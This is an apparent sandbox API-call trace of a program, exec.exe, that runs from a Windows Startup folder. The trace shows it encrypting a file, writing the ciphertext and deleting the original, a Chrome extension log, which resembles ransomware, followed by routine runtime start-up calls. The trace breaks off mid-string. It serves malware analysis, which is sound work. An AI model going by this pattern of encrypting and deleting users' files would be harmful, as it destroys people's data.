CryptSetKeyParam (hKey=0x29c4e0, dwParam=0x1, pbData=0x3f8f8e8, dwFlags=0x0) returned 1 [0123.463] ReadFile (in: hFile=0x344, lpBuffer=0x44f0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3f8f864, lpOverlapped=0x0 | out: lpBuffer=0x44f0020*, lpNumberOfBytesRead=0x3f8f864*=0x4ad, lpOverlapped=0x0) returned 1 [0123.567] CryptEncrypt (in: hKey=0x29c4e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x4b0, dwBufLen=0x4b0 | out: pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x4b0) returned 1 [0123.567] WriteFile (in: hFile=0x334, lpBuffer=0x44f0020*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0x3f8f848, lpOverlapped=0x0 | out: lpBuffer=0x44f0020*, lpNumberOfBytesWritten=0x3f8f848*=0x4b0, lpOverlapped=0x0) returned 1 [0123.568] CryptImportKey (in: hProv=0x254d70, pbData=0x3f8f7d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3f8f840 | out: phKey=0x3f8f840*=0x29c4a0) returned 1 [0123.568] CryptSetKeyParam (hKey=0x29c4a0, dwParam=0x1, pbData=0x3f8f8e8, dwFlags=0x0) returned 1 [0123.568] CryptEncrypt (in: hKey=0x29c4a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x40, dwBufLen=0x40 | out: pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x40) returned 1 [0123.568] CryptDestroyKey (hKey=0x29c4a0) returned 1 [0123.568] WriteFile (in: hFile=0x334, lpBuffer=0x44f0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x3f8f848, lpOverlapped=0x0 | out: lpBuffer=0x44f0020*, lpNumberOfBytesWritten=0x3f8f848*=0xf2, lpOverlapped=0x0) returned 1 [0123.568] CryptDestroyKey (hKey=0x29c4e0) returned 1 [0123.568] CloseHandle (hObject=0x344) returned 1 [0123.568] CloseHandle (hObject=0x334) returned 1 [0123.569] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log")) returned 1 [0123.570] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0124.824] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x50) returned 0x1db1470 [0124.824] CryptImportKey (in: hProv=0x254d70, pbData=0x3f8f830, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3f8f898 | out: phKey=0x3f8f898*=0x29c060) returned 1 [0124.824] CryptSetKeyParam (hKey=0x29c060, dwParam=0x1, pbData=0x3f8f880, dwFlags=0x0) returned 1 [0124.824] CryptDecrypt (in: hKey=0x29c060, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x3f8f84c | out: pbData=0x1db1470, pdwDataLen=0x3f8f84c) returned 1 [0124.824] CryptDestroyKey (hKey=0x29c060) returned 1 [0124.825] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0124.825] GetProcAddress (hModule=0x76180000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x761ad668 [0124.825] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0124.825] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 [0124.825] SetEvent (hEvent=0x278) returned 1 [0124.825] SetEvent (hEvent=0x274) returned 1 [0124.825] SetEvent (hEvent=0x27c) returned 1 [0124.825] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x44f0020 | out: hHeap=0x1db0000) returned 1 [0124.831] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9ac0 | out: hHeap=0x1db0000) returned 1 [0124.831] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fe0070 | out: hHeap=0x1db0000) returned 1 [0124.831] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3ff0078 | out: hHeap=0x1db0000) returned 1 Thread: id = 155 os_tid = 0x250 Thread: id = 223 os_tid = 0x6a0 Process: id = "15" image_name = "exec.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe" page_root = "0x1f271000" os_pid = "0x570" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e209" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 90 os_tid = 0x574 [0101.478] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x34fd24 | out: lpSystemTimeAsFileTime=0x34fd24*(dwLowDateTime=0x4421ab60, dwHighDateTime=0x1d4f12b)) [0101.478] GetCurrentProcessId () returned 0x570 [0101.478] GetCurrentThreadId () returned 0x574 [0101.478] GetTickCount () returned 0x56e5 [0101.478] QueryPerformanceCounter (in: lpPerformanceCount=0x34fd1c | out: lpPerformanceCount=0x34fd1c*=6580429798) returned 1 [0101.479] GetStartupInfoW (in: lpStartupInfo=0x34fcc8 | out: lpStartupInfo=0x34fcc8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x34fd2c, hStdError=0x988be4)) [0101.479] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.479] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1f70000 [0101.480] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0101.480] GetProcAddress (hModule=0x76180000, lpProcName="FlsAlloc") returned 0x76194f2b [0101.480] GetProcAddress (hModule=0x76180000, lpProcName="FlsGetValue") returned 0x76191252 [0101.480] GetProcAddress (hModule=0x76180000, lpProcName="FlsSetValue") returned 0x76194208 [0101.480] GetProcAddress (hModule=0x76180000, lpProcName="FlsFree") returned 0x7619359f [0101.481] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x214) returned 0x1f707d0 [0101.481] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0101.481] GetCurrentThreadId () returned 0x574 [0101.481] GetStartupInfoW (in: lpStartupInfo=0x34fc64 | out: lpStartupInfo=0x34fc64*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x9871aa, hStdOutput=0x9874e3, hStdError=0x1f707d0)) [0101.481] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x800) returned 0x1f709f0 [0101.482] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0101.482] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0101.482] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0101.482] SetHandleCount (uNumber=0x20) returned 0x20 [0101.482] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe\" " [0101.482] GetEnvironmentStringsW () returned 0x384980* [0101.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1409 [0101.482] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x581) returned 0x1f711f8 [0101.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x1f711f8, cbMultiByte=1409, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1409 [0101.482] FreeEnvironmentStringsW (penv=0x384980) returned 1 [0101.482] GetLastError () returned 0x5 [0101.482] SetLastError (dwErrCode=0x5) [0101.482] GetLastError () returned 0x5 [0101.482] SetLastError (dwErrCode=0x5) [0101.482] GetLastError () returned 0x5 [0101.482] SetLastError (dwErrCode=0x5) [0101.482] GetACP () returned 0x4e4 [0101.482] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x220) returned 0x1f71788 [0101.482] GetLastError () returned 0x5 [0101.482] SetLastError (dwErrCode=0x5) [0101.482] IsValidCodePage (CodePage=0x4e4) returned 1 [0101.483] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x34fc2c | out: lpCPInfo=0x34fc2c) returned 1 [0101.483] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x34f6f8 | out: lpCPInfo=0x34f6f8) returned 1 [0101.483] GetLastError () returned 0x5 [0101.483] SetLastError (dwErrCode=0x5) [0101.483] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x34fb0c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.483] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x34fb0c, cbMultiByte=256, lpWideCharStr=0x34f478, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鲧\x98Ā") returned 256 [0101.483] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鲧\x98Ā", cchSrc=256, lpCharType=0x34f70c | out: lpCharType=0x34f70c) returned 1 [0101.483] GetLastError () returned 0x5 [0101.483] SetLastError (dwErrCode=0x5) [0101.483] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x34fb0c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.483] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x34fb0c, cbMultiByte=256, lpWideCharStr=0x34f448, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0101.483] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0101.483] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x34f238, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0101.483] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x34fa0c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xdd\x3a\xea\xcc\x44\xfc\x34", lpUsedDefaultChar=0x0) returned 256 [0101.483] GetLastError () returned 0x5 [0101.483] SetLastError (dwErrCode=0x5) [0101.483] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x34fb0c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.483] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x34fb0c, cbMultiByte=256, lpWideCharStr=0x34f468, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0101.483] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0101.483] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x34f258, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0101.483] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x34f90c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\x